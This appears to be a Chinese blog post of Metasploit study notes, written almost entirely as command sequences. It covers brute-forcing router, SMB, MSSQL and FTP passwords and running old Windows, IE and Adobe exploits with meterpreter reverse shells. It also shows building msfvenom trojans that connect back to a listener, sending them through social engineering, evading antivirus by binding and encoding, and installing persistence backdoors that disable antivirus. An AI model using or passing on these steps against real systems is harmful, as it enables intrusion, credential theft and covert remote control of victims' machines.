MSF入门笔记

玩转Kali 2.0

Metasploit破解路由器密码

步骤:寻找渗透目标;制作密码字典;进行密码破解;进入路由器。

  1. ie输入192.168.1.1
    可以看到输入用户名密码的弹出窗口
  2. crunch
    crunch 3 4 1234567890 -o user.lst #生成3-4位的0-9的密码。
    crunch 8 8 -l 19@@0728 -o user.lst #生成8位的包含19**0728的密码
  3. 启动Metasploit
    msfconsole
    use auxiliary/scanner/http/http_login
    show options
    set rhosts 192.168.1.1
    set rport 80
    set username admin
    set pass_file /root/ps.lst
    设置完毕以后show options,查看参数设置是否成功,没有问题后执行:
    exploit
    然后开始暴力破解。
    4.破解成功

Metasploit破解指定服务器密码

步骤:寻找渗透目标;制作密码字典;进行密码破解;成功拿到服务器权限。

  1. windows 2003系统作为目标
    启动msf
    检查当前局域网环境下存活的主机
    msf > use auxiliary/scanner/discovery/arp_sweep
    set rhosts 192.168.1.100/24
    set threads 50
    exploit
    能找到存活主机
    msf > use auxiliary/scanner/smb/smb_version
    set rhosts 192.168.1.100
    set threads 50
    exploit
    操作系统版本收集,信息收集阶段完成
  2. 制作字典
    crunch
  3. 破解
    msf > use auxiliary/scanner/smb/smb_login
    set rhosts 192.168.43.158
    set threads 50
    set pass_file /root/pass.txt
    exploit
  4. 拿到服务器权限
    打开远程桌面,用刚才破解到的密码登陆

Metasploit破解mssql密码

步骤:收集目标;制作字典;进行密码破解。

  1. 收集目标
    搭建了一个windows 2003,安装了mssql 2000数据库。
    用以上教程,扫描当前存活主机,收集操作系统版本。
    msf > use auxiliary/scanner/discovery/arp_sweep
    网络扫描,选取一个作为目标
    msf > use auxiliary/scanner/portscan/syn
    端口探测,检测到打开了1433端口
    msf > use auxiliary/scanner/smb/smb_version
    扫描主机名称,操作系统,版本
  2. 制作字典
    crunch
  3. 进行密码破解
    msf > use auxiliary/scanner/mssql/mssql_login
    show options
    set rhosts
    set rport
    set username sa
    set pass_file /root/ps.lst
    set theards 50

Metasploit破解ftp密码

步骤:寻找目标;制作字典;进行破解。

  1. 收集目标
    参考以上内容
  2. 制作字典
  3. 参考以上内容
  4. 进行破解
    use auxiliary/scanner/ftp/ftp_version #检测版本
    use auxiliary/scanner/ftp/anonymous #测试是否支持匿名登陆
    use auxiliary/scanner/ftp/ftp_login #破解
    set rhosts 192.168.1.100
    set rport 21
    set username admin
    set pass_file /root/ps.lst
    exploit

Metasploit系列简单教程

ms08_067示例

msf>use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
可以使用info命令查看漏洞的信息
run开始攻击

浏览器漏洞ms10_018

msf>use exploit/windows/browser/ms10_018_ie_behaviors
set payload windows/meterpreter/reverse_tcp
show targets

快捷方式漏洞ms10_046

PDF漏洞利用

CVE-2010-2883

use exploit/windows/fileformat/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
生成pdf文件让客户端打开。
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

爆破模块

生成木马

当不存在漏洞的时候可以通过社会工程学,把生成的木马发送给对方。
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率。利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
msfvenom也可以多次编码,也可以捆绑其他软件。
upx可以对程序进行再次加壳,压缩。
veil 免杀生成木马
配合msf连接被控制端。

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2222 -f exe > /root/test.exe
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2222 -f jar > /root/text.jar
生成test.exe和java.jar木马
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
#msf exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
这里payload不一样
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > run

免杀

veil
veil-evesion 基于msf负载模块生成exe,也需要msf 侦听。
shellter 捆绑工具
免杀有2种办法,可以用捆绑,可以用多次编码。
捆绑,shellter,可以将上面生成的木马捆绑到正常的exe当中。

维持访问

在meterpreter下面执行run persistence 可以设置后门在系统启动、用户登录时执行。
维持访问。即使删除掉源文件也可以。
run persistence -h 查看帮助。
设置完毕以后需要重启。
run scheduleme
持续性后门
run kill av 关闭杀毒软件
run

你可能感兴趣的:(笔记,Metasploit)